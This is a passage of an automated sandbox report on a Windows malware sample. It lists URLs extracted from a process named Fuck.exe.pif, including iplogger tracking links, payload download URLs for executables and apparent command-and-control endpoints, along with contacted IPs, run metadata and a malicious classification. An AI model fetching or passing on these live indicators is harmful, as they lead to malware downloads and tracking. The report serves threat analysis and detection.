                                                          https://2jhbdhjfsdf2.monster/Fuck.exe.pif, 00000014.00000002.47259260074.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42813995024.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42805765241.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000002.47257407587.0000000000B69000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42872737446.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42858765124.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42808030662.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://uewrgu.s3.us-west-2.amazonaws.com/613dge3Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://iplogger.org/1fHtp7Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://cdn.computewall.com/yFuck.exe.pif, 00000014.00000002.47258299554.0000000000B99000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://iplogger.org/1nTYJ4Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://iplogger.org/1pcji7Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://cf43570.tmweb.ru/setup.exeeC:Fuck.exe.pif, 00000014.00000003.42872737446.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://iplogger.org/1nvRF4Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://iplogger.org/1nxVH4Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.remobjects.com/psFagLhQ, 00000015.00000003.42712613293.000000007FB50000.00000004.00001000.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42708112679.00000000026B0000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000000.42724086106.0000000000401000.00000020.00000001.01000000.0000000A.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://b.dowgmeb.com/gamexyz/3004/0c31f204fbfc2138ce1b01698bd18c18.exeCFuck.exe.pif, 00000014.00000002.47259260074.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42813995024.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42805765241.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42872737446.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42775922312.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42782434369.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42858765124.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42808030662.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42764417732.0000000000BC6000.00000004.00000020.00020000.00000000.sdmptrue
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://iplogger.org/1pdxr7Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://iplogger.org/1rqRg7Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.innosetup.com/FagLhQ, 00000015.00000003.42712613293.000000007FB50000.00000004.00001000.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42708112679.00000000026B0000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000000.42724086106.0000000000401000.00000020.00000001.01000000.0000000A.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://b.dowgmeb.com/gamexyz/3004/0c31f204fbfc2138ce1b01698bd18c18.exe_Fuck.exe.pif, 00000014.00000003.42764417732.0000000000BC6000.00000004.00000020.00020000.00000000.sdmptrue
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://iplogger.org/1Jeq67Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://b.dowgmeb.com/gamexyz/3004/0c31f204fbfc2138ce1b01698bd18c18.exeYFuck.exe.pif, 00000014.00000003.42764417732.0000000000BC6000.00000004.00000020.00020000.00000000.sdmptrue
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://iplogger.org/1NpYz7Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://iplogger.org/1746b7Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://ngdatas.pw/https://www.icodeps.com/0.0.0.0%d.%d.%d.%dhttp-1ZIPFuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  http://www.mkpmc.comFuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.autoitscript.com/autoit3/Jl39HA25qjw.exe, 00000001.00000003.42210428960.00000000068C3000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmp, Fuck.exe.pif, 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmp, Fuck.exe.pif, 00000014.00000000.42628391239.0000000000F35000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                    high
                                                                                    https://iplogger.org/1s4qp7Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://iplogger.org/1uW6i7Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://b.dowgmeb.com/Fuck.exe.pif, 00000014.00000002.47257407587.0000000000B69000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://cf43570.tmweb.ru/Fuck.exe.pif, 00000014.00000002.47259260074.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42872737446.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://mnh.ajn322bb.com/files/pe/pb1105.exewlcUivWMjcwgFuck.exe.pif, 00000014.00000003.42716979665.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://www.amazon.com/Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://cf43570.tmweb.ru/setup.exeBFuck.exe.pif, 00000014.00000002.47259260074.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42872737446.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.savesucpnys.xyz/mp3studios_6.exeyFuck.exe.pif, 00000014.00000003.42813995024.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: phishing
                                                                                              unknown
                                                                                              http://www.savesucpnys.xyz/mp3studios6/mp3studios_6.exeown/u4vYmgIN4sqk0fc498Fuck.exe.pif, 00000014.00000002.47258299554.0000000000B99000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: phishing
                                                                                              unknown
                                                                                              http://www.mkpmc.com/Home/Index/getdataFuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://cf43570.tmweb.ru/hFuck.exe.pif, 00000014.00000002.47259260074.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42872737446.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://iplogger.org/1J9q67Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://iplogger.org/1ngVH4Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://b.dowgmeb.com/gamexyz/3004/0c31f204fbfc2138ce1b01698bd18c18.exeJ~?Fuck.exe.pif, 00000014.00000002.47259260074.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42813995024.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42805765241.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42872737446.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42775922312.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42782434369.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42858765124.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42808030662.0000000000BC6000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://sm.ms/api/v2/upload?inajax=1Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.google.com/search?q=admob&oq=admobFuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://iplogger.org/14Jup7Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://cf43570.tmweb.ru/setup.exe(Fuck.exe.pif, 00000014.00000002.47259260074.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42872737446.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://iplogger.org/1nmWH4Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://cf43570.tmweb.ru/setup.exe%Fuck.exe.pif, 00000014.00000003.42872737446.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://iplogger.org/1YkFc7Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://109.206.241.33/files/Hadi.config.CfgEncFilePFuck.exe.pif, 00000014.00000002.47256501864.0000000000B40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://iplogger.org/1CDGu7Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://iplogger.org/1N3J25Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://iplogger.org/1tEnk7Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://iplogger.org/1756b7Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.mxnzvc.xyz:8888/down/u4vYmgIN4sqk/Fuck.exe.pif, 00000014.00000002.47258299554.0000000000B99000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          http://www.mxnzvc.xyz:8888/down/u4vYmgIN4sqk1Fuck.exe.pif, 00000014.00000002.47258299554.0000000000B99000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://adblockfast.com//licenseFagLhQ, 00000015.00000003.43374481813.000000000249C000.00000004.00001000.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42706973626.00000000026B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://iplogger.org/1Gbzj7Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.savesucpnys.xyz/mp3studios_6.exeLMEMXFuck.exe.pif, 00000014.00000002.47259260074.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42872737446.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42858765124.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                            unknown
                                                                                                                            https://cdn.discordapp.com/Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://joinmassive.com/termsFagLhQ, 00000015.00000003.43374481813.000000000249C000.00000004.00001000.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42706973626.00000000026B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://iplogger.org/1XJq97Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://2jhbdhjfsdf2.monster/search_hyperfs_213.exegnFuck.exe.pif, 00000014.00000003.42813995024.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42805765241.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42808030662.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                http://www.savesucpnys.xyz/2jhbdhjfsdf2.monsterS5Fuck.exe.pif, 00000014.00000003.42813995024.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: phishing
                                                                                                                                unknown
                                                                                                                                https://iplogger.org/1Dm7g7Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://iplogger.org/1TCch7Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://cf43570.tmweb.ru/setup.exedFuck.exe.pif, 00000014.00000002.47259260074.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42872737446.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://lgfftg.s3.eu-west-3.amazonaws.com/613jyr1Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://iplogger.org/1H3Fa7Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://iplogger.org/1nEYJ4Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://www.savesucpnys.xyz/mFuck.exe.pif, 00000014.00000002.47259260074.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42872737446.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42858765124.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                            unknown
                                                                                                                                            https://iplogger.org/1xWbz7Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://www.channelinfo.pw/index.php/Home/Index/getExeidnameexe_urlexe_namerun_valuecountry_codeabandFuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                              unknown
                                                                                                                                              https://adblockfast.com/#contact)FagLhQ, 00000015.00000003.43375838077.000000000250C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://iplogger.org/1vx2Q7Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                104.21.34.132
                                                                                                                                                unknownUnited States
                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                92.53.96.116
                                                                                                                                                unknownRussian Federation
                                                                                                                                                9123TIMEWEB-ASRUfalse
                                                                                                                                                149.28.253.196
                                                                                                                                                unknownUnited States
                                                                                                                                                20473AS-CHOOPAUSfalse
                                                                                                                                                104.21.25.158
                                                                                                                                                mnh.ajn322bb.comUnited States
                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                162.159.133.233
                                                                                                                                                unknownUnited States
                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                13.32.99.56
                                                                                                                                                d2l7sw81k13yby.cloudfront.netUnited States
                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                207.180.199.60
                                                                                                                                                www.savesucpnys.xyzGermany
                                                                                                                                                51167CONTABODEtrue
                                                                                                                                                188.72.236.239
                                                                                                                                                2jhbdhjfsdf2.monsterNetherlands
                                                                                                                                                35415WEBZILLANLfalse
                                                                                                                                                103.136.42.153
                                                                                                                                                www.mxnzvc.xyzIndia
                                                                                                                                                139884AGPL-AS-APApeironGlobalPvtLtdINtrue
                                                                                                                                                208.95.112.1
                                                                                                                                                unknownUnited States
                                                                                                                                                53334TUT-ASUSfalse
                                                                                                                                                109.206.241.33
                                                                                                                                                unknownGermany
                                                                                                                                                209929AWMLTNLfalse
                                                                                                                                                188.114.97.3
                                                                                                                                                b.dowgmeb.comEuropean Union
                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                172.67.68.80
                                                                                                                                                cdn.computewall.comUnited States
                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                148.251.234.83
                                                                                                                                                unknownGermany
                                                                                                                                                24940HETZNER-ASDEfalse
                                                                                                                                                188.114.96.3
                                                                                                                                                a.dowgmea.comEuropean Union
                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                23.79.157.152
                                                                                                                                                aka.msUnited States
                                                                                                                                                16625AKAMAI-ASUSfalse
                                                                                                                                                34.142.181.181
                                                                                                                                                g.agametog.comUnited States
                                                                                                                                                2686ATGS-MMD-ASUStrue
                                                                                                                                                Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                                Analysis ID:715502
                                                                                                                                                Start date and time:2022-10-04 07:07:29 +02:00
                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 20m 29s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:full
                                                                                                                                                Sample file name:l39HA25qjw.exe
                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                                Run name:Suspected Instruction Hammering
                                                                                                                                                Number of analysed new started processes analysed:45
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:2
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • HDC enabled
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal100.phis.bank.troj.spyw.expl.evad.mine.winEXE@76/142@13/17
                                                                                                                                                EGA Information:
                                                                                                                                                • Successful, ratio: 66.7%
                                                                                                                                                HDC Information:
                                                                                                                                                • Successful, ratio: 100% (good quality ratio 95%)
                                                                                                                                                • Quality average: 84.5%
                                                                                                                                                • Quality standard deviation: 24.2%
                                                                                                                                                HCA Information:
                                                                                                                                                • Successful, ratio: 99%
                                                                                                                                                • Number of executed functions: 95
                                                                                                                                                • Number of non-executed functions: 313
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, backgroundTaskHost.exe
                                                                                                                                                • Excluded IPs from analysis (whitelisted): 68.232.34.200, 104.208.16.94
                                                                                                                                                • Excluded domains from analysis (whitelisted): visualstudio.download.prss.trafficmanager.net, wdcpalt.microsoft.com, client.wns.windows.com, download.visualstudio.microsoft.com, 4316b.wpc.azureedge.net, cs10.wpc.v0cdn.net, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, wdcp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                                                                                                                                                • Execution Graph export aborted for target Fuck.exe.pif, PID 6488 because there are no executed function
                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                TimeTypeDescription
                                                                                                                                                07:09:28API Interceptor1x Sleep call for process: Fuck.exe.pif modified
                                                                                                                                                07:10:16API Interceptor5x Sleep call for process: FagLhQ.tmp modified
                                                                                                                                                07:10:22API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                                                                                                07:10:22API Interceptor4x Sleep call for process: MpVMRr modified
